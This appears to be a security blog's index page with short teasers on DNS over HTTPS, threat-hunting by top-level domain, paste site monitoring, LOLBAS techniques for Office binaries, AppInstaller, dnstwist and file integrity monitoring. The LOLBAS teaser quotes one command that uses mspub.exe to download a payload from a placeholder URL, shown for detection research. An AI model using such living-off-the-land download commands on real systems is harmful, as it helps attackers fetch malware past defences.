What is DNS over HTTPS (DoH) DoH secures DNS queries by encapsulating them within HTTPS traffic, leveraging encryption to mitigate interception and mitm attacks. Initiated by Google and Mozilla, and notably adopted by Firefox at first, DoH has shifted the DNS landscape towards greater privacy. Defined in RFC 8484, DoH uses HTTP/2 or HTTP/3 for transport…

Understanding the Threat Landscape Top-level domains (TLDs) hold significant influence in the domain name system (DNS) hierarchy and can serve as indicators for threat detection.

This blog post was made in 2016, which I was able to recover through some data carving on old backups I got Hacked In 2009 I was living in France and before the French company ‘Free Mobile’ disrupted the mobile market, we all had to deal with useless and expensive mobile plans. I…

Have you also noticed the aggressive advertising campaigns for VPN providers, promoted by social media influencers and YouTube creators ? As a security analyst, it’s incredibly annoying to hear them spread the lies they’re paid to tell their audience, especially when some of them are already aware that they’re spreading lies. This…

Why is it important to monitor paste sites? Pastebin is a doubled-edged sword widely-used text-sharing platform, while it serves legitimate purposes mostly for developers and tech enthusiasts, it has been abused by threat actors for years to look for leaked information, host malwares, exfiltrate data and even used as a C2. …

The LOLBAS serie : https://medium.com/@mthcht/list/lolbas-843ba9de6810 This time, I’ve selected three LOLbins associated with Microsoft Office. Let’s test and examine each one to determine what we can detect! MSPUB.exe LOL technique for MSPUB.exe Ref LOLBAS: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mspub/ C_h4ck_0 on twitter found a way to download arbitrary files with MSPUB.exe by using the following command: mspub.exe https://example.com/payload

The LOLBAS serie: https://mthcht.medium.com/list/lolbas-843ba9de6810 What is AppInstaller? AppInstaller is an utility that allows the installation of APPX and MSIX packages, leveraged by numerous software editors and playing a key role in software management. What is LOLBAS ? Living Off The Land Binaries and Scripts The goal of the LOLBAS project is to document every binary, script, and…

DNSTWIST for SOC & CTI DNSTWIST Dnstwist is a tool designed to identify domains that might be used in phishing attacks or other malicious activities by generating a comprehensive list of variations on a given domain using the following techniques: Addition: Adds characters to the domain name. Bitsquatting: Uses bit errors to generate similar-looking domain names. …

FIM ? PCI DSS ? File Integrity Monitoring (FIM) is a security process that involves the regular monitoring and detection of changes in files, including system files, configurations, and content files. It is crucial in ensuring that files have not been tampered with, corrupted, or otherwise altered in an unauthorized manner. Payment Card Industry Data…